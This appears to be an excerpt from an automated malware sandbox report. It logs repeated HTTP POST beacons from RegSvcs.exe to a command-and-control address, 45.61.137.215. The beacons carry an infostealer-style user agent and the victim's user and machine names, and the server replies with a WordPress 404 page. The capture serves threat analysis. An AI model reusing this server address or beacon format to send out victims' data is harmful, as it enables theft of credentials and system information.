                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:44:11.849670887 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:44:11.849680901 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:44:11.849694014 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:44:11.849771976 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:44:11.849782944 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                                            May 29, 2024 15:44:11.849920988 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                            Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                                            May 29, 2024 15:44:11.849942923 CEST1236INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                                            Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink)
                                            May 29, 2024 15:44:11.849953890 CEST1236INData Raw: 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70
                                            Data Ascii: --white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            47192.168.2.94976245.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:12.009845018 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:44:12.014758110 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:44:14.588062048 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:44:12 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:44:14.588083982 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:44:14.588115931 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:44:14.588128090 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                                            Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                                            May 29, 2024 15:44:14.588138103 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                                            Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                                            May 29, 2024 15:44:14.588156939 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                                            Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                                            May 29, 2024 15:44:14.588169098 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:44:14.588217020 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:44:14.588228941 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:44:14.588561058 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            48192.168.2.94976345.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:14.760596991 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:44:14.765880108 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:44:17.262957096 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:44:15 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:44:17.262975931 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:44:17.262986898 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:44:17.263000011 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:44:17.263010979 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:44:17.263024092 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                                            Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                                            May 29, 2024 15:44:17.263053894 CEST776INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                                            Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                                            May 29, 2024 15:44:17.263077021 CEST1236INData Raw: 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 7b 64 69 73 70 6c 61 79 3a 20 67 72 69 64 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 20 3e 20 2a 7b 6d 61 72 67 69 6e 3a 20 30 3b 7d 3a 77 68 65 72 65 28
                                            Data Ascii: 0;}body .is-layout-grid{display: grid;}body .is-layout-grid > *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where
                                            May 29, 2024 15:44:17.263088942 CEST1236INData Raw: 64 2d 70 75 72 70 6c 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 62 6c 61 63
                                            Data Ascii: d-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color
                                            May 29, 2024 15:44:17.263102055 CEST1016INData Raw: 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f
                                            Data Ascii: portant;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color:


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            49192.168.2.94976445.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:17.418906927 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:44:17.423820972 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:44:20.001450062 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:44:17 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
